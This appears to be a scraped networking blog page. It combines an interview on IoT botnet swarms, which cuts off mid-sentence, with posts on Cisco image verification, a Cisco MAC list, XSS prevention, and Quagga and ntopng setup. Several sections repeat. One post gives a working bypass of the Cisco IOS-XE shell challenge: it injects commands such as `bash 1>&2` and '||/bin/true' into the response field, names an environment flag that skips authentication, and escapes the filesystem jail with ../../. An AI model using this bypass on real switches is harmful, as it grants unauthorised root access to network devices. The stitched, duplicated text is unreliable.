A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.
TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.
TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.
TP: Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.
TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.
TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.
TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.
TP: Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your
IOS image verfication - running+saved
Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system:
In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using the show software authenticity file on the binary file. The following example shows the output of show software authenticity running on a Cisco 1900 Series Router running the c1900-universalk9-mz.SPA.152-4.M2 image.Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2 File Name : c1900-universalk9-mz.SPA.152-4.M2 Image type : Production Signer Information Common Name : CiscoSystems Organization Unit : C1900 Organization Name : CiscoSystems Certificate Serial Number : 509AC949 Hash Algorithm : SHA512 Signature Algorithm : 2048-bit RSA Key Version : A
This example also shows that the Certificate Serial Number value, 509AC949, matches the one obtained with the previous example.Router# show software authenticity running SYSTEM IMAGE ------------ Image type : Production Signer Information Common Name : CiscoSystems Organization Unit : C1900 Organization Name : CiscoSystems Certificate Serial Number : 509AC949 Hash Algorithm : SHA512 Signature Algorithm : 2048-bit RSA Key Version : A Verifier Information Verifier Name : ROMMON 1 Verifier Version : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport
Cisco IOS-XE - Request Platform System Shell
Verifying Authenticity for Digitally Signed Images
Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]
Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]
No input validation ==> just use the ' '
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]
Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]
What can be done with it? Whatever reality you want, you might create...
[code]
[EXTRA] Building a toolchain for:
[EXTRA] build = x86_64-unknown-linux-gnu
[EXTRA] host = x86_64-unknown-linux-gnu
[EXTRA] target = mips-unknown-elf
bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
[/code]
When you request shell following thing happens:
a) shell_wrapper
calls system('code_sign_verify_nova_pkg SecureShell challenge response')
(same binary is used to verify the images)
b)
code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k
from /dev/mtdblock6, signs challenge, compares to response and return 0
if it is valid, other wise
c) so anything like ||/bin/true will work just fine
shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment
mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
[code]
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc
[/code]
Wednesday, October 17, 2018
Cisco MACs (OUI) addresses - all of them
00:00:0C Cisco # CISCO SYSTEMS, INC.
00:01:42 Cisco # CISCO SYSTEMS, INC.
00:01:43 Cisco # CISCO SYSTEMS, INC.
00:01:63 Cisco # CISCO SYSTEMS, INC.
00:01:64 Cisco # CISCO SYSTEMS, INC.
00:01:96 Cisco # CISCO SYSTEMS, INC.
00:01:97 Cisco # CISCO SYSTEMS, INC.
00:01:C7 Cisco # CISCO SYSTEMS, INC.
00:01:C9 Cisco # CISCO SYSTEMS, INC.
00:02:16 Cisco # CISCO SYSTEMS, INC.
00:02:17 Cisco # CISCO SYSTEMS, INC.
00:02:3D Cisco # Cisco Systems, Inc.
00:02:4A Cisco # CISCO SYSTEMS, INC.
00:01:42 Cisco # CISCO SYSTEMS, INC.
00:01:43 Cisco # CISCO SYSTEMS, INC.
00:01:63 Cisco # CISCO SYSTEMS, INC.
00:01:64 Cisco # CISCO SYSTEMS, INC.
00:01:96 Cisco # CISCO SYSTEMS, INC.
00:01:97 Cisco # CISCO SYSTEMS, INC.
00:01:C7 Cisco # CISCO SYSTEMS, INC.
00:01:C9 Cisco # CISCO SYSTEMS, INC.
00:02:16 Cisco # CISCO SYSTEMS, INC.
00:02:17 Cisco # CISCO SYSTEMS, INC.
00:02:3D Cisco # Cisco Systems, Inc.
00:02:4A Cisco # CISCO SYSTEMS, INC.
Monitor keypresses in Linux CLI (embedded)
Cmd: showkey -a
Press any keys - Ctrl-D will terminate this program
a 97 0141 0x61
b 98 0142 0x62
c 99 0143 0x63
d 100 0144 0x64
e 101 0145 0x65
f 102 0146 0x66
g 103 0147 0x67
Sunday, September 30, 2018
Steps to prevent leverage of cross-site scripting attacks
Cross-site scripting attacks
How-To: Prevent the XSS attack-vector leverage
Additional steps from Development to Deployment
**Developers**
- Should determine what is a safe user input and reject all others - be it a text, javascript or any unauthorized piece of code- Depending on the Input text box, developers can restrict text to certain characters (avoid ones causing troubles) and also limit the maximum number of characters
- should write a code which checks that improperly formatted data are never inserted directly into the HTML content, that might compromise the whole web application
- should implement prepared statements (known to be reliable) for any database queries as well as the input validation described above
**Website operators **
- should carefully choose third-party web app providers to ensure their products have the right security measures in place- should test the web apps to ensure that they are not vulnerable to attacks involving cross-site scripting or SQL injections
- should continuously scan their sites in real-time to detect any unauthorized code. This should involve not only automated website vulnerability scanners (i.e.: Nikto, OVASP)
- you have to be proactive == > hire an experienced professionals ( White or Grey ) who can assess web app security against attacks like these with a custom approach
========================================================================
The last step is important !
Anything less than a pro-active, comprehensive approach to securing the sites will grow to infringement of a great number of consumer's data privacy due to regulations like GDPR.
As a good example of a DO's & DON'Ts we might mention the recent attack on "The British Airways". But you can practically choose any of the large attacks during the past 5 years.
========================================================================
::Remember::
Just because a website is secure that necessarily doesn't mean that a web application is secure as well
source: TechRepublic
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )
Sunday, August 12, 2018
Quagga == Cisco-like CLI in Linux
Quagga Router
( https://www.quagga.net/ )
- Cisco-like interface + commands - that is Quagga Routing Software Suite
- all today-used routing protocols : BGP, OSPF, EIGRP, RIP and also IS-IS
- for routing uses the OS / Linux Kernel -- > no virtualization nor simulation
/ therefore its fast & speed together with lightness is essence...
Kompletni manual v PDF: (download from U.S. NAVY .mil website )
https://downloads.pf.itd.nrl.navy.mil/ospf-manet/archive/quagga-0.99.17mr2.0/quagga.pdf
Install Quagga on Debian, Ubuntu, Gentoo, Centos etc.
-- use the package manager or download latest updated package (production version 0.99)
Ubuntu direct install:
sudo apt install quagga*
Download latest - quagga-1.2.4.tar.gz:
wget http://download.savannah.gnu.org/releases/quagga/quagga-1.2.4.tar.gz /temp
Install & compile :
tar -xzvf /temp/quagga-1.2.4.tar.gz
cd /temp/quagga-1.2.4
cd install
./configure
make
make install
now enable the routing daemons you want to use:
sudo nano /etc/quagga/daemons
Change as needed:
zebra=yes #<<<<<< has to be enabled for basic functionality
bgpd=yes
ospfd=yes
ospf6d=no
ripd=yes
ripngd=yes
isisd=no
babeld=no
Now you can copy the config samples to main dir:
cp /usr/share/doc/quagga/examples/*.* /etc/quagga/
Also edit the configuration file for VTYSH CLI to enable:
cd /etc/quagga
mv vtysh.conf.sample vtysh.conf
Last thing we need to enable IP Forwarding:
#echo "1" > /proc/sys/net/ipv4/ip_forward
This adds the "1" value in /proc/sys/net/ipv4/ip_forward file and activates the IP forwarding
To keep the IP Forwarding "ON" after a Linux reboots edit the /etc/sysctl.conf file:
sudo nano /etc/sysctl.conf
press Ctrl + W and type:
forward
enter
and change value to 1
net.ipv4.ip_forward = 1
Or you can also use:
sudo su
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
So, are you ready?
Run the command vtysh instance:
## vtysh -C
## vtysh
router> enable
router#
router# configure terminal
router(config)#
router(config)#end
router#write
You can start to use the Linux for routing!
In next article ::
explanation howto create BGP session between your home Cisco router /GNS3/ and your cloud VPS
Enjoy!
( https://www.quagga.net/ )
- Cisco-like interface + commands - that is Quagga Routing Software Suite
- all today-used routing protocols : BGP, OSPF, EIGRP, RIP and also IS-IS
- for routing uses the OS / Linux Kernel -- > no virtualization nor simulation
/ therefore its fast & speed together with lightness is essence...
Kompletni manual v PDF: (download from U.S. NAVY .mil website )
https://downloads.pf.itd.nrl.navy.mil/ospf-manet/archive/quagga-0.99.17mr2.0/quagga.pdf
Install Quagga on Debian, Ubuntu, Gentoo, Centos etc.
-- use the package manager or download latest updated package (production version 0.99)
Ubuntu direct install:
sudo apt install quagga*
Download latest - quagga-1.2.4.tar.gz:
wget http://download.savannah.gnu.org/releases/quagga/quagga-1.2.4.tar.gz /temp
Install & compile :
tar -xzvf /temp/quagga-1.2.4.tar.gz
cd /temp/quagga-1.2.4
cd install
./configure
make
make install
now enable the routing daemons you want to use:
sudo nano /etc/quagga/daemons
Change as needed:
zebra=yes #<<<<<< has to be enabled for basic functionality
bgpd=yes
ospfd=yes
ospf6d=no
ripd=yes
ripngd=yes
isisd=no
babeld=no
Now you can copy the config samples to main dir:
cp /usr/share/doc/quagga/examples/*.* /etc/quagga/
Also edit the configuration file for VTYSH CLI to enable:
cd /etc/quagga
mv vtysh.conf.sample vtysh.conf
Last thing we need to enable IP Forwarding:
#echo "1" > /proc/sys/net/ipv4/ip_forward
This adds the "1" value in /proc/sys/net/ipv4/ip_forward file and activates the IP forwarding
To keep the IP Forwarding "ON" after a Linux reboots edit the /etc/sysctl.conf file:
sudo nano /etc/sysctl.conf
press Ctrl + W and type:
forward
enter
and change value to 1
net.ipv4.ip_forward = 1
Or you can also use:
sudo su
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
So, are you ready?
Run the command vtysh instance:
## vtysh -C
## vtysh
router> enable
router#
router# configure terminal
router(config)#
router(config)#end
router#write
You can start to use the Linux for routing!
In next article ::
explanation howto create BGP session between your home Cisco router /GNS3/ and your cloud VPS
Enjoy!
Thursday, August 11, 2016
NetFlow + NtopNG
NetFlow + Ntop-NG
-- after few hours pulling my hairs finally have NetFlow Collector up and running
-- Finally went for Ntop with NBOX webGUI and must admit that graphics is just COOOL!!! :)
-- Dashboard and all working with it is done with precision and experiences
-- can be installed from repositories ;)
sudo dpkg -i apt-ntop-stable.deb
sudo apt-get clean all
sudo apt update
sudo apt install pfring /
nprobe ntopng ntopng-data n2disk cento nbox pfring-drivers-zc-dkms
sudo apt install pfring /
nprobe ntopng ntopng-data n2disk cento nbox pfring-drivers-zc-dkms
sudo apt update
sudo apt install ntopng
(yes, it is really twice here -- first time didn't resolve all dependencies)
(yes, it is really twice here -- first time didn't resolve all dependencies)
To activate the new configuration, you need to run:
service apache2 reload
insserv: warning: script 'K01nfsen' missing LSB tags and overrides
insserv: warning: script 'nfsen' missing LSB tags and overrides
[ ok ] Reloading apache2 configuration (via systemctl): apache2.service.
[ ok ] Restarting apache2 (via systemctl): apache2.service.
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
You can now point your browser to https://localhost/
The default user is nbox with password nbox
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
So you can go ahead and check it - don't forget to change default password and restart apache2 after ... :D
service apache2 reload
insserv: warning: script 'K01nfsen' missing LSB tags and overrides
insserv: warning: script 'nfsen' missing LSB tags and overrides
[ ok ] Reloading apache2 configuration (via systemctl): apache2.service.
[ ok ] Restarting apache2 (via systemctl): apache2.service.
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
You can now point your browser to https://localhost/
The default user is nbox with password nbox
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
So you can go ahead and check it - don't forget to change default password and restart apache2 after ... :D
Subscribe to:
Posts (Atom)